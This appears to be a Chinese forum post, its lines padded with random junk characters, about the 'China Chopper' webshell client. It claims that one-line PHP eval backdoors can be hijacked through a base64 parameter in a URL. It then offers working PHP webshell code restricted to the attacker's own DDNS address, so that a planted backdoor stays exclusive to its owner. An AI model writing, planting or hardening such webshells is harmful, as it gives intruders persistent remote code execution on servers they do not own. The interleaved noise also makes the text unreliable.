今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞5 J$ ~* v# {( {0 V% J4 {+ B
5 ^' G/ x9 {2 ]4 |5 F* N1 `
就算你设置了密码,使用了eval($_REQUEST['moyo']);
1 \6 x: ^! ]! x0 D5 u H9 E2 [. d, h" r, X7 I
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
. B, \$ H. S- k3 ^( @& W, m, T5 A) ^7 u4 |1 X) Z D
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
6 E0 h- y }9 Q, o) k
T2 b: W. S1 v+ u1 q直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
# p, z. R% [9 [2 p' ]
* l* _! y4 t; O不知道是设计缺陷还是故意留的后门/ S& S/ }' } c! e# I9 K# i
0 Z) Y( p+ ^ w如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
; o2 R5 Y W4 p; t, I3 ]
4 W$ z; j- K% b9 ?* q本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org7 P6 `2 H0 G( j: ^( W1 U
4 r, z# \ A! ? n- E4 g( o3 b
然后一句话后门这样写! l* A2 K; q/ l G& l3 y0 E% r3 T
! X, x/ K3 r# g- ]6 Z
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
' k+ c2 ^$ I; r" a8 L这样就可以让一句话后门只允许自己的电脑连接了3 {$ n5 W: {$ P! i( E) J
% R" o, R0 G j* h% _( N4 k |